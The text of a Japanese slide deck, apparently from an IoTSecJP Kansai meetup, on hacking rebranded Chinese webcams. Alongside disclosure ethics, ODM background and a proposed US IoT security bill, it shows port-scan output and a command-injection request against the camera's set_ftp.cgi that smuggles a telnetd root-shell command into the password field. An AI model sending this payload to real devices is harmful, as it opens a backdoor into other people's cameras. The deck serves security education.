way

1. IoTSecJP関西

2. 運営プロフィール
黒林檎(村島正浩)
Twitter:r00tapple
Facebook:村島正浩
所属:株式会社神戸デジタル・ラボ
中西波瑠
Twitter:NakanishiHaru
Facebook:中西波瑠
所属:株式会社神戸デジタル・ラボ

3. スケジュール
「中華ウェブカメラ」のセキュリティについて(NDA必須:12時~14時)
http://r00tapple.hatenablog.com/entry/2017/08/12/050252
(1)発表
「中華ウェブカメラのハッキング後記」 by黒林檎(@r00tapple)
「中華ウェブカメラの基板から見た疑問点」 by中西さん軽く宜しくお願いします！
※LT発表希望者おられればお願いします。(直接連絡ください)
(2)参加者が攻撃してみる・自由に触ってみる(NDA必須:14時~16時)
・既知の脆弱性（公になっている攻撃）
・0day(公に公開されておらず、修正されていない脆弱性)
(3)集団デスカッション(NDA検討中)(16時~18時)
・どういう被害が生まれるか
・どういった対策を取るべきか
※ここに関しては、NDA外せるか検討してます。

4. 何故「IoTSecJP」?

6. 65人が「いいね！」しました
100人がフォローしています
IoTSecJP・・・
有志による、「IoTSecJP関東」とか
「IoTSec北海道」とかできたら良い

7. 何故・・・・・
「中華カメラのハッキング」?

9. 自己紹介
• 名前
• 職業(仕事にしていること？)
• どこから来たか？
• ひとこと？

10. 中華ウェブカメラハッキング後記

12. 記事を書くのは

13. 脆弱性報告記事を書く時の注意点
早く記事を書くことで、アクセス数が稼げる
・既知のexploitコードを使う(既知でない攻撃は公開すべきではない)
・(結果が出ていたとして)予測のみを書く
遅く書いてもアクセスが稼げる
・対応(修正や「仕様です」などの返信)が終了してから、記事に
する。

14. 未知の脆弱性(0day)は、ショボいやつで
も晒してはダメ

16. 独自検証した
人まで増えた

17. https://www.alibaba.com/product-detail/Top-Sale-Zoom-WIFI-IP-
Camera_60548931577.html
ODM商品
親製品に販売メーカーのロゴを
入れて卸売りしてる。
国内で話題になっているウェブ
カメラが、これの可能性は高い。

18. 元のカメラだと推測できるもの

21. POINT

22. 似たような事例
~HEMS編~

23. Link
Japan

24. Broad
Link

25. eRemote
Is
RM mini 3

26. そういう話って普通なの？

28. 開発ソリューションを販売している

30. 国内だと珍しいけど中国だと・・・？

31. どう思いますか？

32. 中華ウェブカメラの
ハッキング後記
黒林檎

33. STARCAM

34. TOTORO
MODEL!!!!!

35. 何故、同じファームウェアを使ってると
思ってしまったか？

36. NDAにより削除

37. NDAにより削除

38. 同じような処理してるところに、同じ脆
弱性が存在している(これは・・？)

39. 基板チェック

42. STARCAM
HI3518

43. TOTORO
MODEL!!!!!
HI3518

44. IoT

45. 開発プラットフォーム(SDK)
が提供されている

46. http://jp.ecplaza.net/tradeleads/seller/39496/hisiliconhi3510ip.html

47. 古そうなカメラだ・・。
既知のexploitがあればそ
れを使おう

48. 攻撃に使えそ
うなやつない
かなー？
====================
Host is up (0.027s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
9600/tcp open micromuse-ncpw
10080/tcp open unknown(RTSP)
10554/tcp open unknown(ONVIF)
40202/tcp open unknown(HTTP)
====================

49. 組み込み機器専用のexploit-dbもある
https://www.exploit-db.com/platform/?p=hardware

50. ip camera hacking hi3518

52. It’s fun !

53. It’s great !

54. Quick Hacking

55. 再起動ごとに、
httpサーバーの
ポートが変わる
ちょっと特殊な
ウェブカメラです。

56. カメラ側の対策

57. もしかして・・・・？
ちょっと対策してる？

58. DOWN

62. GET
/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=h0geh0ge&svr=192.168.1.1&port=21&user=ftp
&pwd=%24(telnetd%20-p23%20-l%2Fbin%2Fsh)&dir=/&mode=0&upload_interval=0
GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=h0geh0ge
Telnet
Backdoor!

63. https://www.alibaba.com/product-
detail/Top-Sale-Zoom-WIFI-IP-
Camera_60548931577.html

64. OEM・ODMの違いとは
OEMとは、Original Equipment Manufacturingの略語で、委託
者のブランドで製品を生産すること、または生産するメーカのこ
とです。
ODMとは、Original Design Manufacturingの略語で、委託者の
ブランドで製品を設計、生産することをいいます。
生産コスト削減のために製品またはその部品を他の国内企業や海
外企業などに委託して、販売に必要な数量だけの製品の供給を受
ける委託者である企業のメリットは、大きいものといえます。
http://www.smzs.co.jp/article/14330688.html

65. Vuln ODM in the World !

68. Vuln ODM in
the World !
(画像削除)

72. ちょっと、DEMO

73. 触ってみようの
コーナー

74. ターン！
• １ターン(14時~)
中華IPカメラや中華スマートプラグ触ってみよう。
攻撃経路を考えよう
• ２ターン（15時～）
考えた攻撃経路を実際に攻撃しよう
• ３ターン(16時～)
攻撃結果からどんな悪用が考えられるか？
• 4ターン？(時間余ったら懇親会する？)

75. discussion

76. メーカーが米国政府にIoTを売り込みたい場合
(米国政府のIoTセキュリティ基準に準拠している)

77. デバイスは、NISTの脆弱性データベースなどに記載されている
・ハードウェア
・ソフトウェア
・ファームウェア
の脆弱性を持つことはできません

78. 製造元から認証された信頼できるソフトウェアアップデート
を受信できる必要があります。

79. 推奨されていないネットワークと暗号化プロトコルは使用で
きません

80. ・リモート管理
・更新
・通信
のための固定またはハードコード化された資格情報を持たない

81. 新たに発見された脆弱性は、顧客に開示されなければならない

82. 将来の更新のサポート
(法案の草案には、どれくらいの期間必要であるかが記載され
ておらず、ベンダーにとっては恐ろしい)

83. 新たに発見された脆弱性については、適時の修復を提供する必
要がある。